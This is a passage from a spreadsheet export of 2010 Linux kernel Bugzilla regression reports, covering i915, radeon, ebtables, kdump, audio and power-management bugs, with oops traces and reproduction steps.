f3fd3e60 00000002 f35b5c4c f363d400 00000000 f35b5ccf f35b5c64 f8541ada [ 16.756004] f363d40c 00000000 0000000e f3fd3c00 f363d400 00000000 00000038 00000001 [ 16.756004] f35b5c48 00010038 f8540001 f35b5ccf f35b5cdc f854549d f35b5ccf 00000014 [ 16.756004] Call Trace: [ 16.756004] [&lt;f8541ada&gt;] ? intel_sdvo_read_byte.clone.8+0x4a/0x90 [i915] [ 16.756004] [&lt;f8540001&gt;] ? intel_dp_set_m_n+0x201/0x480 [i915] [ 16.756004] [&lt;f854549d&gt;] ? intel_sdvo_init+0x19d/0x5c0 [i915] [ 16.756004] [&lt;f853acc7&gt;] ? intel_crt_init+0xe7/0x2f0 [i915] [ 16.756004] [&lt;f852d2ed&gt;] ? intel_setup_outputs+0x37d/0x730 [i915] [ 16.756004] [&lt;f8539705&gt;] ? intel_modeset_init+0x195/0x360 [i915] [ 16.756004] [&lt;f85120a1&gt;] ? i915_load_modeset_init+0x131/0x200 [i915] [ 16.756004] [&lt;f8511720&gt;] ? i915_vga_set_decode+0x0/0x30 [i915] [ 16.756004] [&lt;f851064f&gt;] ? intel_detect_pch+0x2f/0x80 [i915] [ 16.756004] [&lt;f8513e84&gt;] ? i915_driver_load+0x334/0x8e0 [i915] [ 16.756004] [&lt;f836e5c3&gt;] ? drm_get_pci_dev+0x153/0x300 [drm] [ 16.756004] [&lt;c05fb20f&gt;] ? _raw_spin_lock_irqsave+0x2f/0x50 [ 16.756004] [&lt;f8551d72&gt;] ? i915_pci_probe+0x12/0x14 [i915] [ 16.756004] [&lt;c038af37&gt;] ? local_pci_probe+0x47/0xb0 [ 16.756004] [&lt;c038c418&gt;] ? pci_device_probe+0x68/0x90 [ 16.756004] [&lt;c042763d&gt;] ? really_probe+0x4d/0x150 [ 16.756004] [&lt;c042fb9b&gt;] ? pm_runtime_barrier+0x4b/0xb0 [ 16.756004] [&lt;c04278dc&gt;] ? driver_probe_device+0x3c/0x60 [ 16.756004] [&lt;c0427981&gt;] ? __driver_attach+0x81/0x90 [ 16.756004] [&lt;c0427900&gt;] ? __driver_attach+0x0/0x90 [ 16.756004] [&lt;c0426968&gt;] ? bus_for_each_dev+0x48/0x70 [ 16.756004] [&lt;c04274ee&gt;] ? driver_attach+0x1e/0x20 [ 16.756004] [&lt;c0427900&gt;] ? __driver_attach+0x0/0x90 [ 16.756004] [&lt;c04270a1&gt;] ? bus_add_driver+0xc1/0x2c0 [ 16.756004] [&lt;c038bdc0&gt;] ? pci_device_remove+0x0/0xf0 [ 16.756004] [&lt;c0427bc6&gt;] ? driver_register+0x66/0x110 [ 16.756004] [&lt;c038b4d5&gt;] ? __pci_register_driver+0x45/0xb0 [ 16.756004] [&lt;f836e8d6&gt;] ? drm_pci_init+0x96/0xc0 [drm] [ 16.756004] [&lt;f8366e24&gt;] ? drm_init+0x54/0x70 [drm] [ 16.756004] [&lt;f857008f&gt;] ? i915_init+0x8f/0x91 [i915] [ 16.756004] [&lt;c0101255&gt;] ? do_one_initcall+0x35/0x170 [ 16.756004] [&lt;f8570000&gt;] ? i915_init+0x0/0x91 [i915] [ 16.756004] [&lt;c0101255&gt;] ? do_one_initcall+0x35/0x170 [ 16.756004] [&lt;f8570000&gt;] ? i915_init+0x0/0x91 [i915] [ 16.756004] [&lt;c018903b&gt;] ? sys_init_module+0x9b/0x1e0 [ 16.756004] [&lt;c0226612&gt;] ? sys_write+0x42/0x70 [ 16.756004] [&lt;c05fb494&gt;] ? syscall_call+0x7/0xb [ 16.756004] Code: ff ff 5d c3 89 f6 8d bc 27 00 00 00 00 55 89 e5 57 56 53 83 ec 0c 3e 8d 74 26 00 bb a1 ff ff ff 89 c6 8b 40 0c 89 55 f0 89 4d ec &lt;8b&gt; 00 85 c0 74 6f 89 e0 25 00 e0 ff ff f7 40 14 ff ff ff ef 75 [ 16.756004] EIP: [&lt;c04ca13e&gt;] i2c_transfer+0x1e/0xc0 SS:ESP 0068:f35b5c14 [ 16.756004] CR2: 0000000000000000 [ 16.761639] ---[ end trace 53912a785b2ee2cb ]---</t>
  </si>
  <si>
    <t>no sound on spdif</t>
  </si>
  <si>
    <t>2.6.35.9-64</t>
  </si>
  <si>
    <t>2010-12-05 10:33 UTC</t>
  </si>
  <si>
    <t>ciekawy</t>
  </si>
  <si>
    <t>2012-06-13 14:59 UTC</t>
  </si>
  <si>
    <t>the sound on spdif has gone between 2.6.35.6-45 and 2.6.35.9-64 -these are versions avaliable in fedora. so after booting to older kernel everything works well again. there is nothing special in any log files. also my digital reciever shows pcm signal incoming during playback, however it wrongly shows 'pcm' input also when trying to play ac3/dts and in all cases there is no sound. I am using intel hda chipset (currently have no possibility to check analog audio now) card 0: Intel [HDA Intel], device 0: ALC889 Analog [ALC889 Analog] Subdevices: 1/1 Subdevice #0: subdevice #0 card 0: Intel [HDA Intel], device 1: ALC889 Digital [ALC889 Digital] Subdevices: 0/1 Subdevice #0: subdevice #0 00:1b.0 Audio device: Intel Corporation 5 Series/3400 Series Chipset High Definition Audio (rev 06)</t>
  </si>
  <si>
    <t>perf hw  in kexeced kernel broken in tip</t>
  </si>
  <si>
    <t>v2.6.37-rc4</t>
  </si>
  <si>
    <t>2010-12-05 14:18 UTC</t>
  </si>
  <si>
    <t>2011-01-15 12:49 UTC</t>
  </si>
  <si>
    <t>Subject : perf hw in kexeced kernel broken in tip Submitter : Yinghai Lu &lt;yinghai@kernel.org&gt; Date : 2010-12-01 8:00 Message-ID : 4CF60095.1020900@kernel.org References : http://marc.info/?l=linux-kernel&amp;m=129119055922065&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline. Caused by: commit 33c6d6a7ad0ffab9b1b15f8e4107a2af072a05a0 Author: Don Zickus &lt;dzickus@redhat.com&gt; Date: Mon Nov 22 16:55:23 2010 -0500 x86, perf, nmi: Disable perf if counters are not accessible Reported-by: Jason Wessel &lt;jason.wessel@windriver.com&gt; Patch-inspired-by: Peter Zijlstra &lt;peterz@infradead.org&gt; Signed-off-by: Don Zickus &lt;dzickus@redhat.com&gt; Signed-off-by: Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Cc: Stephane Eranian &lt;eranian@google.com&gt; LKML-Reference: &lt;1290462923-30734-1-git-send-email-dzickus@redhat.com&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : 33c6d6a7ad0ffab9b1b15f8e4107a2af072a05a0</t>
  </si>
  <si>
    <t>kdump broken on 2.6.37-rc4</t>
  </si>
  <si>
    <t>2.6.37-rc4</t>
  </si>
  <si>
    <t>2010-12-05 14:34 UTC</t>
  </si>
  <si>
    <t>2010-12-30 10:55 UTC</t>
  </si>
  <si>
    <t>Subject : kdump broken on 2.6.37-rc4 Submitter : Stanislaw Gruszka &lt;sgruszka@redhat.com&gt; Date : 2010-12-03 11:16 Message-ID : 20101203111623.GA2741@redhat.com References : http://marc.info/?l=linux-kernel&amp;m=129137502323003&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.37-rc4: kdm crashes consistently, 2.6.36 not affected, drm:radeon_cs_ioctl Invalid command stream</t>
  </si>
  <si>
    <t>2010-12-05 14:39 UTC</t>
  </si>
  <si>
    <t>2010-12-17 00:45 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.37-rc4: kdm crashes consistently, 2.6.36 not affected, drm:radeon_cs_ioctl Invalid command stream Submitter : jurriaan &lt;thunder7@xs4all.nl&gt; Date : 2010-12-04 13:16 Message-ID : 20101204131638.GA2933@rivierenland.xs4all.nl References : http://marc.info/?l=linux-kernel&amp;m=129146874520259&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>AGP aperture disabled, worked in 2.6.35</t>
  </si>
  <si>
    <t>2010-12-06 06:31 UTC</t>
  </si>
  <si>
    <t>2011-02-19 23:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 39082 [details] dmesg booting 2.6.35 with the AGP aperture enabled Hi, Since upgrading to 2.6.36 I've noticed that the AGP aperture is disabled... My system is an old 32-bit-only Pentium 4 with a fair amount of devices, which means address space is tight, but everything does fit. I've tried reducing the size of the aperture, but that doesn't change anything; the attached logs correspond to a 128MB aperture. If there's anything I can do to help figure out what's going wrong, feel free to ask! Regards, Stephen</t>
  </si>
  <si>
    <t>r600: spread spectrum: flickering screen (bisected)</t>
  </si>
  <si>
    <t>2.6.37-rc5</t>
  </si>
  <si>
    <t>2010-12-08 16:18 UTC</t>
  </si>
  <si>
    <t>2011-02-14 13:56 UTC</t>
  </si>
  <si>
    <t>2.6.37-rc5 exhibits a slight screen (notebook panel) flickering, mostly noticeable around text (e.g. white-on-black in xterm) with occasional horizontal lines; using 2.6.36 as known "good" kernel I've bisected the issue down to this commit: ba032a58d1f320039e7850fb6e8651695c1aa571 is the first bad commit commit ba032a58d1f320039e7850fb6e8651695c1aa571 Author: Alex Deucher &lt;alexdeucher@gmail.com&gt; Date: Mon Oct 4 17:13:01 2010 -0400 drm/radeon/kms: rework spread spectrum handling This patch reworks spread spectrum handling to enable it properly on lvds and DP/eDP links. It also fixes several bugs in the old spread spectrum code. - Use the ss recommended reference divider if available when calculating the pll - Use the proper ss command tables on pre-DCE3 asics - Avoid reading past the end of the ss info tables - Enable ss on evergreen asics (lvds, dp, tmds) - Enable ss on DP/eDP links Signed-off-by: Alex Deucher &lt;alexdeucher@gmail.com&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; :040000 040000 2017e6abb9a12586686bcddb61479f2b158c9d7c 7e6117db061ef286ab6822455c65cf5492de7eaa M drivers Hardware is a M76: 01:00.0 VGA compatible controller: ATI Technologies Inc M76 [Radeon Mobility HD 2600 Series] dmesg is attached.</t>
  </si>
  <si>
    <t>SBS - Battery status is updated only on AC/DC event, not every minute - Acer Travelmate 2301</t>
  </si>
  <si>
    <t>2.6.32 (Debian 2.6.32-5-686)</t>
  </si>
  <si>
    <t>2010-12-08 22:41 UTC</t>
  </si>
  <si>
    <t>Lorenzo Masellis</t>
  </si>
  <si>
    <t>2011-08-06 02:08 UTC</t>
  </si>
  <si>
    <t>On a Acer Travelmate 2301, the battery status (energy, current, etc.) doesn't get updated, unless events are triggered (e.g. charger disconnection). Example, with charger on, an old reading is reported: testuser@castor:~$ cat /sys/class/power_supply/BAT0/energy_now 1120000 Immediately after, having unplugged the charger in order to trigger an event, sysfs gets updated: testuser@castor:~$ cat /sys/class/power_supply/BAT0/energy_now 13600000</t>
  </si>
  <si>
    <t>_OSI("Linux") always return FALSE</t>
  </si>
  <si>
    <t>2010-12-09 08:30 UTC</t>
  </si>
  <si>
    <t>tomsun</t>
  </si>
  <si>
    <t>2011-07-30 06:56 UTC</t>
  </si>
  <si>
    <t>I use the kernel-2.6.36 on Laptop, add "acpi_osi=Linux" parameters in grub.conf. but it can't work, because _OSI("Linux") always return FALSE. From the dmesg, kernel says that _OSI(Linux) is successfully enabled and added. I don't know why the BIOS says no. the attachment is "dmesg &gt; acpi_osi.log". Thank you~</t>
  </si>
  <si>
    <t>ebtables OUTPUT table rule using interface in bridge with STP causes kernel oops and panic</t>
  </si>
  <si>
    <t>2.6.34 and up</t>
  </si>
  <si>
    <t>2010-12-09 13:08 UTC</t>
  </si>
  <si>
    <t>Sebastian J. Bronner</t>
  </si>
  <si>
    <t>2011-01-24 13:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 39602 [details] Log of kernel Oops and panic with stp-enabled-bridge and ebtables commands to reproduce (as root): NIF=eth0 # any interface will do PROT=arp # tested with arp and ipv4 TARG=DROP # tested with DROP and ACCEPT brctl addbr testbr brctl addif testbr $NIF brctl stp testbr on ip link set up dev testbr ip link set up dev $NIF ebtables -A OUTPUT -p $PROT -o $NIF -j $TARG The gist of it: Given a bridge and physical interface with link state up, the interface is assigned to the bridge, and the bridge has STP turned on. If, under this combination of circumstances, an ebtables rule is created in the OUTPUT table that specifies the physical interface, a kernel Oops is triggered (the kernel output is attached): """ (short excerpt) [ 1105.953771] BUG: unable to handle kernel paging request at ffff8801379bda0b [ 1105.963752] IP: [&lt;ffffffffa0225aa6&gt;] ebt_do_table+0x5d6/0x6d0 [ebtables] [ 1105.963752] PGD 1a2b063 PUD 1a067 PMD 0 [ 1105.963752] Oops: 0000 [#1] SMP """ It is immediately followed by a kernel panic (also in the attached file): """ (short excerpt) [ 1106.101435] Kernel panic - not syncing: Fatal exception in interrupt [ 1106.101435] Pid: 2060, comm: kvm Tainted: G D 2.6.35-23-server #41-Ubuntu """ It appears to be irrelevant what protocol is specified with the -p option, although when _no_ protocol is specified, the Oops and panic do not occur. I tested with -p arp and -p ipv4. It also appears to be irrelevant what target is specified with the -j option. I tested with -j DROP and -j ACCEPT. My test environment was ubuntu maverick 64-bit using mainline (unpatched) kernels. The tools versions were as follows: * bridge-utils 1.4-5ubuntu2 * iproute 20100519-2 * ebtables 2.0.9.2-2 I tested the following kernels with identical results (Oops and panic): * 2.6.34-020634rc1-generic * 2.6.34-02063401-generic * 2.6.34-02063407-generic * 2.6.35-02063507-generic * 2.6.35-02063508-generic * 2.6.35-02063509-generic * 2.6.36-020636rc6-generic * 2.6.36-020636rc7-generic * 2.6.36-020636rc8-generic * 2.6.36-020636-generic * 2.6.36-02063601-generic * 2.6.37-999-generic (daily-201012081134) Testing versions in reverse order, I finally came to a version that did not exhibit the problem (no Oops or panic - the system remained usable): * 2.6.33-02063307-generic As a last bit of curiosity, I looked at the patch for 2.6.34rc1 and saw that ebtables.c has undergone extensive modifications. I have the gut feeling that the issue is related to those modifications. If I can provide any other test results or more specifics about the test environment, or if I should re-test in another environment alltogether, please advise.</t>
  </si>
  <si>
    <t>k8-powernow does not see all cores</t>
  </si>
  <si>
    <t>2010-12-09 14:57 UTC</t>
  </si>
  <si>
    <t>2011-03-30 23:36 UTC</t>
  </si>
  <si>
    <t>During boot, I get this summary on my AMD 890FX/SB850 chipset: SMP: Allowing 6 CPUs, 0 hotplug CPUs setup_percpu: NR_CPUS:4096 nr_cpumask_bits:6 nr_cpu_ids:6 nr_node_ids:1 PERCPU: Embedded 27 pages/cpu @ffff880006000000 s80704 r8192 d21696 u262144 pcpu-alloc: s80704 r8192 d21696 u262144 alloc=1*2097152 pcpu-alloc: [0] 0 1 2 3 4 5 - - SLUB: Genslabs=13, HWalign=64, Order=0-3, MinObjects=0, CPUs=6, Nodes=1 RCU-based detection of stalled CPUs is disabled. Verbose stalled-CPUs detection is disabled. CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 mce: CPU supports 6 MCE banks CPU0: AMD Phenom(tm) II X6 1090T Processor stepping 00 Switch to broadcast mode on CPU1 Switch to broadcast mode on CPU2 Switch to broadcast mode on CPU3 Switch to broadcast mode on CPU4 Brought up 6 CPUs Switch to broadcast mode on CPU5 Switch to broadcast mode on CPU0 And a bit further down cores 4 and 5 are not seen by "powernow-k8": powernow-k8: Found 1 AMD Phenom(tm) II X6 1090T Processor (6 cpu cores) (version 2.20.00) powernow-k8: Core Performance Boosting: on. powernow-k8: 0 : pstate 0 (3200 MHz) powernow-k8: 1 : pstate 1 (2400 MHz) powernow-k8: 2 : pstate 2 (1600 MHz) powernow-k8: 3 : pstate 3 (800 MHz) Frequency scaling does work on all 6 cores once the system is up and running. ----------------------------- Finally, should this: "AMD Opteron/Athlon64 PowerNow!" under CPU Frequency scaling inside the kernel be called something else to accommodate the K10 (Phenom) line?</t>
  </si>
  <si>
    <t>Kernel Oops at tty_buffer_request_room when using pppd program (2.6.37-rc4)</t>
  </si>
  <si>
    <t>2010-12-09 19:16 UTC</t>
  </si>
  <si>
    <t>2011-06-18 08:24 UTC</t>
  </si>
  <si>
    <t>Subject : Kernel Oops at tty_buffer_request_room when using pppd program (2.6.37-rc4) Submitter : "baoyb" &lt;baoyb@avit.org.cn&gt; Date : 2010-12-08 13:55 Message-ID : EF6DDE218DB34702B1FA84D6CD7EA771@baoyb References : http://marc.info/?l=linux-kernel&amp;m=129181763525738&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.37-rc5: NULL pointer oops in selinux_socket_unix_stream_connect</t>
  </si>
  <si>
    <t>2010-12-09 19:22 UTC</t>
  </si>
  <si>
    <t>2011-01-10 20:24 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.37-rc5: NULL pointer oops in selinux_socket_unix_stream_connect Submitter : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Date : 2010-12-08 21:09 Message-ID : 4CFFF3F3.90100@goop.org References : http://marc.info/?l=linux-kernel&amp;m=129184256629712&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>modprobe bttv crashes system</t>
  </si>
  <si>
    <t>2010-12-09 21:48 UTC</t>
  </si>
  <si>
    <t>2010-12-27 10:19 UTC</t>
  </si>
  <si>
    <t>Created attachment 39652 [details] dmesg output After boot kernel 2.6.37-rc5 I do: # modprobe tvaudio # modprobe tuner # modprobe bttv crashes here (dmesg output attached), usually system hangs. 2.6.36 works well. modprobe.conf: options bttv card=42 i2c_udelay=128 options tuner pal=d alias snd-card-0 snd-bt87x alias sound-slot-0 snd-bt87x</t>
  </si>
  <si>
    <t>Memory allocation failure is not handled in fat_cache_add()</t>
  </si>
  <si>
    <t>2010-12-10 09:36 UTC</t>
  </si>
  <si>
    <t>Eugene A. Shatokhin</t>
  </si>
  <si>
    <t>2011-05-25 09:12 UTC</t>
  </si>
  <si>
    <t>The situation when memory allocation made in fat_cache_add() function fails is not handled (fs/fat/cache.c:153): 151: spin_unlock(&amp;MSDOS_I(inode)-&gt;cache_lru_lock); 152: 153: tmp = fat_cache_alloc(inode); 154: spin_lock(&amp;MSDOS_I(inode)-&gt;cache_lru_lock); This may result in bad pointer dereference when executing 'cache-&gt;fcluster = new-&gt;fcluster;' later (fs/fat/cache.c:166). It seems, this problem is quite unlikely to occur in practice, it only showed up during fault simulation session performed by our tools, but still.</t>
  </si>
  <si>
    <t>Core i7 loses its multithreading capability after suspend</t>
  </si>
  <si>
    <t>2.6.34 r12 gentoo-sources</t>
  </si>
  <si>
    <t>2010-12-12 14:31 UTC</t>
  </si>
  <si>
    <t>Keivan Moradi</t>
  </si>
  <si>
    <t>2011-01-17 00:28 UTC</t>
  </si>
  <si>
    <t>On my gentoo-linux system (2.6.34-gentoo-sources amd64), with a xeon 5540 (core i7) , each time I resume after the command "pm-suspend" (suspend to RAM), mutlithreading capabilities almost disappear. More specifically, two distinct programs can use 2 distinct cores at full rate, but a single program is limited to only one core (for one instance of a multithreaded program as well as multiple instances of a single threaded program, e.g. "make -j 4" for gcc). So I end up rebooting the system. Any help appreciated! There are other people have this problem. this is a upstream bug. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=580901 http://codeme.gotdns.com/2010/04/30/core-i7-on-linux-loses-its-multithreading-capability-after-suspend/ http://superuser.com/questions/136291/core-i7-on-linux-loses-its-multithreading-capability-after-suspend also these bug reports may be related to this one https://bugzilla.kernel.org/show_bug.cgi?id=16567 https://bugzilla.kernel.org/show_bug.cgi?id=13885</t>
  </si>
  <si>
    <t>Unable to set txpower higher than 8dBm.</t>
  </si>
  <si>
    <t>2.6.36.1 and 2.6.36.2</t>
  </si>
  <si>
    <t>2010-12-12 18:28 UTC</t>
  </si>
  <si>
    <t>2010-12-14 23:51 UTC</t>
  </si>
  <si>
    <t>My rt2860 miniPCI card can go up to 27dBm But I am unable to set the txpower to 27dBm: # iwconfig wlan0 txpower 27dBm Error for wireless request "Set Tx Power" (8B26) : SET failed on device wlan0 ; Invalid argument. Here are the relevant loaded modules: # lsmod | grep rt2 rt2800pci 7165 0 rt2800lib 25848 1 rt2800pci rt2x00pci 4001 1 rt2800pci rt2x00lib 24223 3 rt2800pci,rt2800lib,rt2x00pci mac80211 178681 3 rt2800lib,rt2x00pci,rt2x00lib cfg80211 120268 2 rt2x00lib,mac80211 eeprom_93cx6 964 1 rt2800pci crc_ccitt 1047 2 rt2800lib,irda</t>
  </si>
  <si>
    <t>Wireless warning, system locks up</t>
  </si>
  <si>
    <t>2.6.37-rc5-git3</t>
  </si>
  <si>
    <t>2010-12-14 15:16 UTC</t>
  </si>
  <si>
    <t>2010-12-29 22:49 UTC</t>
  </si>
  <si>
    <t>Using latest 2.6.37-rc5-git3 kernel, suddenly my machine locked up. Attached is the output in /var/log/warn directly before that happened.</t>
  </si>
  <si>
    <t>Regression: audio not detected "cannot build controls"</t>
  </si>
  <si>
    <t>2.6.37-rc</t>
  </si>
  <si>
    <t>2010-12-16 20:38 UTC</t>
  </si>
  <si>
    <t>2010-12-19 12:03 UTC</t>
  </si>
  <si>
    <t>Subject : Regression: audio not detected "cannot build controls" Submitter : Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Date : 2010-12-14 19:54 Message-ID : 20101214115449.6e569c86@jbarnes-desktop References : http://marc.info/?l=linux-kernel&amp;m=129235650912313&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: i915 causes NULL pointer dereference in 2.6.37-rc5-git4</t>
  </si>
  <si>
    <t>2.6.37-rc5-git4</t>
  </si>
  <si>
    <t>2010-12-16 20:48 UTC</t>
  </si>
  <si>
    <t>2010-12-30 22:39 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: i915 causes NULL pointer dereference in 2.6.37-rc5-git4 Submitter : Tõnu Raitviir &lt;jussuf@linux.ee&gt; Date : 2010-12-15 12:48 Message-ID : alpine.DEB.2.00.1012151238570.4797@jbbyvx.ohzcpyho.rr References : http://www.spinics.net/lists/dri-devel/msg06282.html This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[cppcheck] function returns not intialized variable in linux-2.6/arch/arm/mach-omap2/pm44xx.c</t>
  </si>
  <si>
    <t>2.6-git head</t>
  </si>
  <si>
    <t>2010-12-16 21:00 UTC</t>
  </si>
  <si>
    <t>during a check of the current git head of the linux kernel with the static code analysis tool cppcheck (http://sourceforge.net/apps/mediawiki/cppcheck/index.php?title=Main_Page) the tool discovered a not initialized variable in linux-2.6/arch/arm/mach-omap2/pm44xx.c. This happens if the preprocessor command -DCONFIG_PM and -DCONFIG_SUSPEND is not set! Here is the code snippet to illustrate: static int __init omap4_pm_init(void) { int ret; if (!cpu_is_omap44xx()) return -ENODEV; pr_err("Power Management for TI OMAP4.\n"); #ifdef CONFIG_PM ret = pwrdm_for_each(pwrdms_setup, NULL); if (ret) { pr_err("Failed to setup powerdomains\n"); goto err2; } #endif #ifdef CONFIG_SUSPEND suspend_set_ops(&amp;omap_pm_ops); #endif /* CONFIG_SUSPEND */ err2: return ret; } Best regards Ettl Martin</t>
  </si>
  <si>
    <t>Kernel panic observed on a Dell Power Edge 2970 when user space accesses the dcdbas driver attributes</t>
  </si>
  <si>
    <t>2.6.37-rc6</t>
  </si>
  <si>
    <t>2010-12-17 14:00 UTC</t>
  </si>
  <si>
    <t>Narendra K</t>
  </si>
  <si>
    <t>2012-05-12 15:38 UTC</t>
  </si>
  <si>
    <t>The 2.6.37-rc6 kernel panics when a user space utility "smbios-sys-info-lite" retrieves systems management information from dcdbas driver. [root@2970-rhel6 software]# ./smbios-sys-info-lite_x86_64 Libsmbios: 2.2.26 System ID: 0x0205 Service Tag: 21LNZ1S Express Service Code: 4450421296 Aset Tag: PE2970 Product Name: PowerEdge 2970 BIOS Version: 4.2.1 Vendor: Dell Inc. Is Dell: 1 The utility generates SMI to retrieve the above information by accessing files in the following directory - /sys/devices/platform/dcdbas [root@2970-rhel6 dcdbas]# ls driver host_control_on_shutdown modalias smi_data smi_data_buf_size subsystem host_control_action host_control_smi_type power smi_data_buf_phys_addr smi_request uevent The panic can be observed when the utility is run for 3 or 4 times. I have seen the kernel panic within 4 attempts. The call trace looks like this - Fixing recursive fault but reboot is needed! BUG: unable to handle kernel paging request at fffffffffffffff8 IP: [&lt;ffffffff81082ee0&gt;] kthread_data+0x10/0x20 PGD 1a05067 PUD 1a06067 PMD 0 Oops: 0000 [#1] SMP last sysfs file: /sys/devices/platform/dcdbas/smi_data_buf_phys_addr CPU 0 Modules linked in: fuse sunrpc ipt_REJECT nf_conntrack_ipv4 nf_defrag_ipv4 iptable_filter ip_tables ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 xt_state nf_conntrack ip6table_filter ip6_tables ipv6 dm_mirror dm_region_hash dm_log uinput bnx2 sg ses enclosure dcdbas serio_raw pcspkr amd64_edac_mod edac_core edac_mce_amd i2c_piix4 shpchp ext4 mbcache jbd2 sd_mod crc_t10dif ata_generic pata_acpi sata_svw megaraid_sas radeon ttm drm_kms_helper drm hwmon i2c_algo_bit i2c_core dm_mod [last unloaded: mperf] Pid: 2146, comm: smbios-sys-info Not tainted 2.6.37-rc6.2970.SMI+ #1 0Y436H/PowerEdge 2970 RIP: 0010:[&lt;ffffffff81082ee0&gt;] [&lt;ffffffff81082ee0&gt;] kthread_data+0x10/0x20 RSP: 0018:ffff8800374f7da8 EFLAGS: 00010096 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff880077ff6080 RDX: 000000000000d172 RSI: 0000000000000000 RDI: ffff880077ff6080 RBP: ffff8800374f7da8 R08: 000000000000f172 R09: ffffffffffffffa8 R10: 0000000000000003 R11: 00000000ffffffff R12: 00000000ffffffff R13: 0000000000000000 R14: ffff880077ff6080 R15: 0000000000000000 FS: 00007fa72a48c700(0000) GS:ffff88007f800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: fffffffffffffff8 CR3: 0000000037092000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process smbios-sys-info (pid: 2146, threadinfo ffff8800374f6000, task ffff880077ff6080) Stack: ffff8800374f7dc8 ffffffff8107d505 ffff8800374f7de8 ffff88007f814c80 ffff8800374f7e98 ffffffff814a7a0e 0000000000000010 0000000300000001 0000000000014c80 ffff880077ff6080 ffff880077ff6610 ffff8800374f7fd8 Call Trace: [&lt;ffffffff8107d505&gt;] wq_worker_sleeping+0x15/0xa0 [&lt;ffffffff814a7a0e&gt;] schedule+0x51e/0xa40 [&lt;ffffffff81066c30&gt;] do_exit+0x7c0/0x860 [&lt;ffffffff81066d21&gt;] do_group_exit+0x51/0xc0 [&lt;ffffffff81066da7&gt;] sys_exit_group+0x17/0x20 [&lt;ffffffff8100c042&gt;] system_call_fastpath+0x16/0x1b Code: 66 66 66 90 65 48 8b 04 25 80 cc 00 00 48 8b 80 40 05 00 00 8b 40 f0 c9 c3 66 90 55 48 89 e5 66 66 66 66 90 48 8b 87 40 05 00 00 &lt;48&gt; 8b 40 f8 c9 c3 66 2e 0f 1f 84 00 00 00 00 00 55 48 89 e5 66 RIP [&lt;ffffffff81082ee0&gt;] kthread_data+0x10/0x20 RSP &lt;ffff8800374f7da8&gt; CR2: fffffffffffffff8 ---[ end trace 83da087df41215b6 ]--- Fixing recursive fault but reboot is needed! Observations - 1. Initially this issue was seen on a PowerEdge 2970 with a single quad core "Quad-Core AMD Opteron(tm) Processor 2350" with 2GB memory. It was not reproducible on a different PowerEdge 2970. 2. With some more experimentation i observed that the issue could be seen on another PowerEdge 2970 with two six core "Six-Core AMD Opteron(tm) Processor 2435" processors by restricting the processor and memory to max_cpus=4 mem=2G 3. Also putting printks in dcdbas.c -&gt; dcdbas_smi_request() function delayed the occurrence of the issue by a long time. 4. As of now, this issue is not seen on other PowerEdge systems. 4. I am attaching the utility which reproduces the kernel panic to this bug report. The sources of the utility can be found here - http://linux.dell.com/libsmbios/download/libsmbios/libsmbios-2.2.26/ Also, attching the cpuinfo and meminfo output from the failing system. Please let me know if this bug report should be filed under a different section. Also please let us know if any other information is required to investigate the issue.</t>
  </si>
  <si>
    <t>BUG: while bridging Ethernet and wireless device:</t>
  </si>
  <si>
    <t>2010-12-19 09:06 UTC</t>
  </si>
  <si>
    <t>2011-01-23 15:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 40792 [details] error log bridging between Ethernet and wifi driver in AP mode triggers BUG_ON while in rx path. Steps to Reproduce iw wlan0 set type __ap ifconfig eth0 0.0.0.0 ifconfgi wlan0 0.0.0.0 brctl addbr br0 brctl addif br0 wlan0 brctl addif br0 eth0 ifconfig br0 10.0.0.1/24 up traffic from Wifi-Client-&gt;wlan0 -&gt; eth0 -&gt; Ether-Client This is regression in sense that there wasn't such crush int kernels 2.6.29 as far as I remember. http://marc.info/?l=linux-netdev&amp;m=129250180417228&amp;w=2</t>
  </si>
  <si>
    <t>[BUG] i915 boot got black screen with 2.6.37-rc5+</t>
  </si>
  <si>
    <t>2010-12-19 20:41 UTC</t>
  </si>
  <si>
    <t>2011-01-27 10:19 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] i915 boot got black screen with 2.6.37-rc5+ Submitter : Hui Zhu &lt;teawater@gmail.com&gt; Date : 2010-12-15 00:34 Message-ID : AANLkTimOOmFqxU=r+-RphdfPJ54Qr+6LHU60Grzpnerr@mail.gmail.com References : http://www.mail-archive.com/stable@linux.kernel.org/msg01384.html This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Offline cpu prevents sibling core to go to deep sleep state</t>
  </si>
  <si>
    <t>2.6.37</t>
  </si>
  <si>
